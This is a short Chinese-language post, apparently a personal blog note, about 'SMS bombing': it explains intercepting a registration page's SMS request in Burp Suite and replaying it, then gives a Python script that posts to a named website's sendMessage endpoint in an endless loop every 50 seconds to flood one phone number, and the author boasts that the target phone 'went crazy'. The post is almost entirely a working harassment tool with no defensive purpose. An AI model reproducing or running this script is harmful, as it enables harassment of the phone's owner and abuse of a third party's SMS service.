手机轰炸,burpsuit 抓取注册页面输入的手机号,然后每点击一次forword ,都开开始放行,发短信。也可以发到repeat 里面进行 ,重复发送短信。
import requests
import time
s = requests.Session()
data = "phone=**********"
headers = {
'UserAgent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'http://www.otryin.com/',
}
while True:
s.post(url="http://www.otryin.com/sendMessage", data=data,headers=headers)
print '---'.join(['send message sucess', data])
time.sleep(50)
搞了半天终于出来了,实现每隔50秒,对一个手机进行短信骚扰。功能有待改善。
备注: 需要对phone进行赋值,运行 python req.py
结果: 那部手机疯了